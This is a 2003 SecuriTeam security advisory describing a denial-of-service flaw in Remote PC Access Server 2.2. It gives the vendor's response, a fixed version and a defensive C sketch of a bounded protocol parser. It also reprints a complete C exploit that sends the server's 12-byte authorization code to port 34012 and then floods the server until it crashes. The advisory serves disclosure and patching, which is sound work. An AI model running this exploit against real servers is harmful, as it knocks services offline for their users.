[NT] Remote PC Access Server DoS Attack Vulnerability

From: SecuriTeam (support_at_securiteam.com)
Date: 05/30/03

    To: list@securiteam.com
    Date: 30 May 2003 00:05:58 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Remote PC Access Server DoS Attack Vulnerability
    ------------------------------------------------------------------------

    SUMMARY

    Remote PC Access is "fast, compact software for accessing and controlling
    any computer from any computer on the Internet or on local area networks
    (LAN). View the remote PC's screen, control its keyboard, and mouse just
    as if you were sitting in front of it. The software transparently works
    through firewalls and routers, and has support for dynamic IP addresses.
    There is also an option to connect to a remote computer by its nickname
    instead of its IP address". A vulnerability in the product allows
    attackers to cause the product to stop responding by sending it malformed
    packets.

    DETAILS

    Vulnerable systems:
     * Remote PC Access Server version 2.2

    Immune systems:
     * Remote PC Access Server version 3.1

    How can the vulnerability be exploited?
    Remote PC Access Server uses an authorization code to verify that a
    Remote PC Access Client has connected to it. The authorization code is
    12 bytes long and consists of the following byte sequence:

    Authorization Code (Hex): 27 00 00 00 04 00 00 00 00 00 00 00 = 12 Bytes

    An attacker can build a spoofed client and use it for a DoS attack that
    crashes the remote server or the system it runs on. Once a client sends
    the authorization code, the server replies with an acknowledgment code;
    after that exchange, packets of any type sent by the client overflow the
    server.
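    As an added example (not the advisory's or the vendor's code), the check a server-side fix would need: a receive state machine that compares the 12-byte authorization code exactly and bounds every later read, so arbitrary post-handshake traffic is rejected instead of overrunning a buffer. The framing assumed after the handshake, a little-endian 32-bit type and length followed by a payload capped at 256 bytes, is an assumption for illustration; the advisory documents only the authorization code.

```c
#include <stdint.h>
#include <string.h>
#include <stddef.h>

#define AUTH_LEN    12
#define HDR_LEN     8          /* assumed: u32 type + u32 length, little-endian */
#define MAX_PAYLOAD 256        /* assumed upper bound for one message body */

/* Authorization code from the advisory: 27 00 00 00 04 00 00 00 00 00 00 00 */
static const unsigned char AUTH_CODE[AUTH_LEN] =
    { 0x27, 0, 0, 0, 0x04, 0, 0, 0, 0, 0, 0, 0 };

enum state { ST_AUTH, ST_HDR, ST_BODY, ST_CLOSED };

struct conn {
    enum state st;
    unsigned char buf[HDR_LEN + MAX_PAYLOAD];
    size_t used, need;         /* bytes held / bytes required for this step */
    uint32_t type;             /* type field of the last complete frame */
    unsigned long frames;      /* complete frames accepted after the handshake */
};

static uint32_t le32(const unsigned char *p) {
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

void conn_init(struct conn *c) {
    memset(c, 0, sizeof *c);
    c->st = ST_AUTH;
    c->need = AUTH_LEN;
}

/* Feed bytes as they arrive from the socket. Returns 0 while the peer follows
 * the protocol and -1 once the connection must be closed. No path writes
 * beyond sizeof buf, however much the peer sends. */
int conn_feed(struct conn *c, const unsigned char *data, size_t len) {
    for (size_t i = 0; i < len; i++) {
        if (c->st == ST_CLOSED) return -1;
        c->buf[c->used++] = data[i];         /* used < need <= sizeof buf */
        if (c->used < c->need) continue;
        switch (c->st) {
        case ST_AUTH:                        /* exact match, nothing else is accepted */
            if (memcmp(c->buf, AUTH_CODE, AUTH_LEN) != 0) { c->st = ST_CLOSED; return -1; }
            c->st = ST_HDR; c->need = HDR_LEN; break;
        case ST_HDR: {
            uint32_t n = le32(c->buf + 4);
            if (n > MAX_PAYLOAD) { c->st = ST_CLOSED; return -1; }  /* the bounds check */
            c->type = le32(c->buf);
            if (n == 0) { c->frames++; break; }
            c->st = ST_BODY; c->need = HDR_LEN + n; continue;   /* keep header, read body */
        }
        case ST_BODY:
            c->frames++; c->st = ST_HDR; c->need = HDR_LEN; break;
        default: return -1;
        }
        c->used = 0;
    }
    return 0;
}
```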

    Solution:
    A new version of Remote PC Access Server (version 3.1) has been released:
    http://www.access-remote-pc.com/download/rpcsetup.exe

    Vendor Response:
    "Your report suggests that the server part of our software can be crashed
    by abusing the communication protocol employed between client and server
    (namely DoS attack). We are aware of this problem and it affects only a
    few places inside the source code. We are releasing a new version in a
    week or two which doesn't have this security vulnerability." (Sergey
    Stoma)

    Exploit:
    /*****************************************************************************
    ------------------------------------------------------------------------------
     Remote PC Server Version 2.2 - Vulnerability Check (Source Version)
     Copyright (c) 2003 Yaron Tal. All Rights Reserved.
    ------------------------------------------------------------------------------
    ** Overview
    ******************************************************************

        Remote PC Access Server uses an authorization code to verify that a
        Remote PC Access Client has connected to the local server. The
        authorization code is 12 bytes long and consists of the following
        byte sequence:

        Authorization Code (Hex): 27 00 00 00 04 00 00 00 00 00 00 00 = 12 Bytes

        The attacker can build a spoofed client program and use it for a DoS
        attack, in order to crash the remote server or remote system. If a
        local client sends the authorization code to the remote server, the
        remote server sends an acknowledgment code back to the local client;
        after this process, by sending packets of any type, the local client
        overflows the remote server.

    ** Terms OF Services
    *********************************************************

    You may not use, copy, modify, decompile, disassemble, emulate, clone,
    rent, lease, sell, otherwise reverse engineer, or transfer this program or
    any subset of this program; any such unauthorized use shall result in
    immediate and automatic termination of this license and may result in
    criminal and/or civil prosecution.

    Yaron Tal is not responsible for any special, incidental, indirect or
    consequential damages that may happen when you use this program. This
    program can crash remote server or system.

    *****************************************************************************
        - Website: www.ytech.co.il \ Email: yarontal@ytech.co.il
        - Copyright (C) 2003 Yaron Tal. All Rights Reserved.
    *****************************************************************************/

    #include <stdio.h>
    #include <stdlib.h>
    #include <conio.h>
    #include <string.h>
    #include <winsock.h>

    #define WVERSION MAKEWORD(2,2)

    int main(int argc, char *argv[])
    {
        SOCKET wSocket;
        WSADATA wsaData;
        SOCKADDR_IN wAddress;
        char Ch = 0, Msg[256];
        int Len;

        /* Authorization code: 11 explicit bytes plus the string literal's
           terminating NUL make up the 12 bytes described above. */
        unsigned char Packet[] = "\x27\x00\x00\x00"
                                 "\x04\x00\x00\x00"
                                 "\x00\x00\x00";

        printf("\nRemote PC Server Version 2.2 - Vulnerability Check (Source Version)\n");
        printf("Copyright (C) 2003 Yaron Tal. All Rights Reserved.\n\n");
        printf("Usage: <%s> <Remote IP Address>\n", argv[0]);

        if (argc < 2) exit(1);

        if (WSAStartup(WVERSION, &wsaData))
        {
            printf("- Error: WSAStartup. (%d)\n", GetLastError());
            exit(1);
        }

        memset(&wAddress, 0, sizeof(wAddress));
        wSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

        if (wSocket == INVALID_SOCKET)
        {
            printf("Error: socket() (%d)\n", GetLastError());
            exit(1);
        }

        /* Remote PC Access Server listens on TCP port 34012 */
        wAddress.sin_family = AF_INET;
        wAddress.sin_addr.s_addr = inet_addr(argv[1]);
        wAddress.sin_port = htons(34012);

        if (connect(wSocket, (LPSOCKADDR)&wAddress, sizeof(struct sockaddr)) == SOCKET_ERROR)
        {
            printf("Error: connect() (%d)\n", GetLastError());
            exit(1);
        }

        printf("Connected To Remote Host...\n");
        printf("Sending Data...\n\n");

        /* Step 1: send the 12-byte authorization code */
        if (send(wSocket, (const char *)Packet, sizeof(Packet), 0) == SOCKET_ERROR)
        {
            printf("- Error: send() (%d)\n", GetLastError());
            exit(1);
        }

        printf("Press ESC to disconnect and exit program.");

        /* Step 2: read the server's acknowledgment, then keep sending
           packets until ESC is pressed or the connection drops */
        while (Ch != 27)
        {
            if (kbhit()) Ch = getch();

            memset(Msg, 0, sizeof(Msg));
            /* the original passed strlen(Msg), which is 0 after the memset,
               so nothing was ever received; use the buffer size instead */
            Len = recv(wSocket, Msg, sizeof(Msg), 0);
            if (Len == SOCKET_ERROR)
            {
                printf("Error: recv() (%d)\n", GetLastError());
                exit(1);
            }
            if (Len == 0) break;   /* server closed the connection */

            if (send(wSocket, Msg, sizeof(Msg), 0) == SOCKET_ERROR)
            {
                printf("- Error: send() (%d)\n", GetLastError());
                exit(1);
            }
        }

        closesocket(wSocket);
        WSACleanup();
        return 0;
    }

    ADDITIONAL INFORMATION

    The information has been provided by Yaron Tal (yarontal@ytech.co.il).

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

